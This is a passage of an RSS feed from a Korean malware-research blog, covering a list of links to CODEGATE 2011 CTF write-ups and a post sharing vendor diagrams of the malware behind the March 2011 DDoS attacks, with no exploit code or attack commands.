&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/133&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>0-day</category>
			<category>Acrobat</category>
			<category>adobe</category>
			<category>Adobe Reader</category>
			<category>CVE-2011-0609</category>
			<category>Flash Player</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/133</guid>
			<comments>http://malwarelab.tistory.com/entry/New-Adobe-Zero-Day-CVE-2011-0609#entry133comment</comments>
			<pubDate>Tue, 15 Mar 2011 05:30:02 +0900</pubDate>
		</item>
		<item>
			<title>CODEGATE 2011 YUT Quals Writeups by others (update)</title>
			<link>http://malwarelab.tistory.com/entry/CODEGATE-2011-YUT-Quals-Writeups-by-others-update</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;&amp;nbsp;&lt;/P&gt;
&lt;P style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;IMG style=&quot;FLOAT: none; CLEAR: none&quot; src=&quot;http://yut.codegate.org/content/images/codegate_logo.jpg&quot;&gt;&lt;br /&gt;
&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;해외 블로거들의 Codegate 20011 CTF writeup이 속속 나오고 있군요..&lt;br /&gt;
&lt;br /&gt;조만간 국내 참가팀들의 writeup도 올라로겠죠?&lt;br /&gt;
&lt;br /&gt;참고하시기 바랍니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Writeup – CODEGATE 2011 by Team Zenk&lt;/STRONG&gt;&lt;br /&gt;
(crypto100,200 / network100,300 / binary100 / vulnerab100,200 / forensics100,300 / issues100)&lt;br /&gt;
&lt;A title=&quot;[http://www.lestutosdenico.com/evenements/writeup-codegate-2011]로 이동합니다.&quot; href=&quot;http://www.lestutosdenico.com/evenements/writeup-codegate-2011&quot; target=_blank&gt;http://www.lestutosdenico.com/evenements/writeup-codegate-2011&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Codegate Writeups by Leet More&lt;/STRONG&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-binary-200/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-binary-200/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-binary-200/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-issue-500-bootsector/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-issue-500-bootsector/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-issue-500-bootsector/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto-400/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto-400/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto-400/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-yut-2011-forensic-300issue-300/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-yut-2011-forensic-300issue-300/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-yut-2011-forensic-300issue-300/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-mini-writeups/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto300-writeup/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto300-writeup/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-crypto300-writeup/&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://leetmore.ctf.su/wp/codegate-ctf-2011-vuln-300/]로 이동합니다.&quot; href=&quot;http://leetmore.ctf.su/wp/codegate-ctf-2011-vuln-300/&quot; target=_blank&gt;http://leetmore.ctf.su/wp/codegate-ctf-2011-vuln-300/&lt;/A&gt; &lt;FONT color=#e31600&gt;&lt;STRONG&gt;(03.09 added)&lt;/STRONG&gt;&lt;/FONT&gt;&lt;br /&gt;
&lt;br /&gt;* Padocon CTF 2011 Writeup도 있습니다.&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;CODEGATE YUT 2011: Issue 500 writeup by SECURITY BLACK SWAN&lt;/STRONG&gt;&lt;br /&gt;
&lt;A title=&quot;[http://securityblackswan.blogspot.com/2011/03/codegate-yut-2011-issue-500-writeup.html]로 이동합니다.&quot; href=&quot;http://securityblackswan.blogspot.com/2011/03/codegate-yut-2011-issue-500-writeup.html&quot; target=_blank&gt;http://securityblackswan.blogspot.com/2011/03/codegate-yut-2011-issue-500-writeup.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Codegate CTF 2011 Vuln300 Writeup by UNTITLED&lt;br /&gt;
&lt;/STRONG&gt;&lt;A title=&quot;[http://auntitled.blogspot.com/2011/03/codegate-ctf-2011-vuln300-writeup.html]로 이동합니다.&quot; href=&quot;http://auntitled.blogspot.com/2011/03/codegate-ctf-2011-vuln300-writeup.html&quot; target=_blank&gt;http://auntitled.blogspot.com/2011/03/codegate-ctf-2011-vuln300-writeup.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Oracle padding attacks (Codegate crypto 400 writeup)&lt;/STRONG&gt;&lt;br /&gt;
&lt;A title=&quot;[http://isc.sans.edu/diary.html?storyid=10501]로 이동합니다.&quot; href=&quot;http://isc.sans.edu/diary.html?storyid=10501&quot; target=_blank&gt;http://isc.sans.edu/diary.html?storyid=10501&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Codegate 2011 CTF Writeup - Vuln 400 by bashrc&lt;br /&gt;
&lt;/STRONG&gt;&lt;A title=&quot;[http://lollersk8ers.fatihkilic.de/2011/03/codegate-2011-ctf-writeup-vuln-400.html]로 이동합니다.&quot; href=&quot;http://lollersk8ers.fatihkilic.de/2011/03/codegate-2011-ctf-writeup-vuln-400.html&quot; target=_blank&gt;http://lollersk8ers.fatihkilic.de/2011/03/codegate-2011-ctf-writeup-vuln-400.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&lt;FONT color=#3058d2&gt;&lt;FONT color=#e31600&gt;03.09 added!!&lt;/FONT&gt;&lt;br /&gt;
&lt;/FONT&gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;STRONG&gt;hasegawa yosuke&lt;br /&gt;
&lt;/STRONG&gt;&lt;A title=&quot;[http://www.netagent-blog.jp/archives/51762319.html]로 이동합니다.&quot; href=&quot;http://www.netagent-blog.jp/archives/51762319.html&quot; target=_blank&gt;http://www.netagent-blog.jp/archives/51762319.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;PPP&lt;br /&gt;
&lt;/STRONG&gt;&lt;A title=&quot;[http://ppp.cylab.cmu.edu/wordpress/?p=466]로 이동합니다.&quot; href=&quot;http://ppp.cylab.cmu.edu/wordpress/?p=466&quot; target=_blank&gt;http://ppp.cylab.cmu.edu/wordpress/?p=466&lt;/A&gt;&lt;br /&gt;
&lt;A title=&quot;[http://ppp.cylab.cmu.edu/wordpress/wp-content/uploads/2011/03/Codegate2011PQ-Writeup-PPP.pdf]로 이동합니다.&quot; href=&quot;http://ppp.cylab.cmu.edu/wordpress/wp-content/uploads/2011/03/Codegate2011PQ-Writeup-PPP.pdf&quot; target=_blank&gt;http://ppp.cylab.cmu.edu/wordpress/wp-content/uploads/2011/03/Codegate2011PQ-Writeup-PPP.pdf&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Hates Irony&lt;/STRONG&gt;&lt;br /&gt;
&lt;A title=&quot;[https://hatesirony.com/codegate2011/]로 이동합니다.&quot; href=&quot;https://hatesirony.com/codegate2011/&quot; target=_blank&gt;https://hatesirony.com/codegate2011/&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;문제 파일들&lt;/STRONG&gt;&lt;br /&gt;
&lt;A title=&quot;[https://files.nibbles.fr/codegate-2011/]로 이동합니다.&quot; href=&quot;https://files.nibbles.fr/codegate-2011/&quot; target=_blank&gt;https://files.nibbles.fr/codegate-2011/&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile23.uf.tistory.com/original/1510464B4D7825EE236E1F&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile23.uf.tistory.com/image/1510464B4D7825EE236E1F&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;codegate2011_YUT_qualified_teams.png&quot; height=&quot;422&quot; width=&quot;259&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;임시 랭킹에서 1개팀(EightNine Line)이 탈락되고 PLUS가 올라왔군요!!&lt;br /&gt;
머 어쨋든 한국팀은 3개네요 :)&lt;br /&gt;
&lt;br /&gt;스웨덴 팀인 HackingForSoju팀이 본선에 진출해서 한국에 오겠군요.&lt;br /&gt;
운영위원회에서 이들에게 다양하고 맛있는 소주를 대접하리라 예상됩니다. ;)&lt;br /&gt;
참고로 가능하시다면 막 대학 들어갔을때 먹었던 일명 두꺼비 소주나 과일주 담그는 30도짜리 pet병에 담긴 것도 괜찮으리라 생각됩니다. 필요하시면 공수해보겠습니다. ㅋㅋ&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile30.uf.tistory.com/original/157ADB514D76DC2B2086E5&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile30.uf.tistory.com/image/157ADB514D76DC2B2086E5&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;codegate2011_YUT_temp_rank.png&quot; height=&quot;702&quot; width=&quot;437&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-132-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-132-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-132-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/132&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>2011</category>
			<category>cft</category>
			<category>CODEGATE</category>
			<category>quals</category>
			<category>writeup</category>
			<category>yut</category>
			<category>코드게이트</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/132</guid>
			<comments>http://malwarelab.tistory.com/entry/CODEGATE-2011-YUT-Quals-Writeups-by-others-update#entry132comment</comments>
			<pubDate>Thu, 10 Mar 2011 10:22:39 +0900</pubDate>
		</item>
		<item>
			<title>3.4 DDoS 공격에 사용된 악성코드간의 관계도</title>
			<link>http://malwarelab.tistory.com/entry/34-DDoS-%EA%B3%B5%EA%B2%A9%EC%97%90-%EC%82%AC%EC%9A%A9%EB%90%9C-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C%EA%B0%84%EC%9D%98-%EA%B4%80%EA%B3%84%EB%8F%84</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
모두들 고생하셨습니다.&lt;br /&gt;
&lt;br /&gt;정치적으로 그리고 홍보 목적으로 전면에 나선 사람들 말고 진짜 뒤에서 고생하신 분들 많습니다.&lt;br /&gt;
&lt;br /&gt;(안타깝게도 전 다른 프로젝트에 참가 중이라 그리 많은 시간을 할애하지 못했습니다 ㅜ.ㅜ)&lt;br /&gt;
&lt;br /&gt;이번엔 초기보고서나 샘플이 빨리 공유되어 피해가 덜했던 것 같습니다.&lt;br /&gt;
&lt;br /&gt;절대 장비가 좋아서가 아닙니다. -_-&lt;br /&gt;
&lt;br /&gt;개인적으로 이번 사건은 사람의 힘으로 DDoS를 막았다고 평가하고 싶습니다.&lt;br /&gt;
&lt;br /&gt;여담이지만 들어오는 트래픽을 막는데만 힘을 쏟을게 아니라&lt;br /&gt;
&lt;br /&gt;그런 트래픽을 쏘는 좀비들을 찾아서 빨리 치료하는 또는 그런 좀비가 안생기게 하는게 정확한 해결책이라 생각됩니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;본론으로 들어와서...&lt;br /&gt;
&lt;br /&gt;지금까지 나온 악성코드간의 관계도 그림이 있어 공유합니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&amp;lt;안철수연구소&amp;gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile5.uf.tistory.com/original/1968DC4A4D74915222ECC0&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile5.uf.tistory.com/image/1968DC4A4D74915222ECC0&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;4179282653.jpg&quot; height=&quot;499&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&amp;lt;이스트소프트&amp;gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile24.uf.tistory.com/original/1273B54E4D74916419AD43&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile24.uf.tistory.com/image/1273B54E4D74916419AD43&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;이스트소프트_DDoS_관계도.png&quot; height=&quot;528&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&amp;lt;하우리&amp;gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile24.uf.tistory.com/original/2043CB434D75914F26B287&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile24.uf.tistory.com/image/2043CB434D75914F26B287&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;hauri.png&quot; height=&quot;641&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;&amp;lt;잉카인터넷&amp;gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile25.uf.tistory.com/original/1744C43F4D75916811C20B&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile25.uf.tistory.com/image/1744C43F4D75916811C20B&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;엔프로텍트.jpg&quot; height=&quot;536&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
처음부터 직접 분석을 하지 못했지만 나왔던 문서들을 토대로 저도 그림을 그려봤습니다.&lt;br /&gt;
(은근 그림 그리는거 좋아라 합니다. ~.~)&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile10.uf.tistory.com/original/1872684C4D74924F298641&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile10.uf.tistory.com/image/1872684C4D74924F298641&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;33ddos_01.png&quot; height=&quot;492&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile24.uf.tistory.com/original/1572684C4D7492502AF759&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile24.uf.tistory.com/image/1572684C4D7492502AF759&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;33ddos_02.png&quot; height=&quot;491&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
다들 수고하셨습니다!!&lt;br /&gt;
&lt;br /&gt;이번주말엔 푹~ 쉬시기 바랍니다!!&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-131-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-131-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-131-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
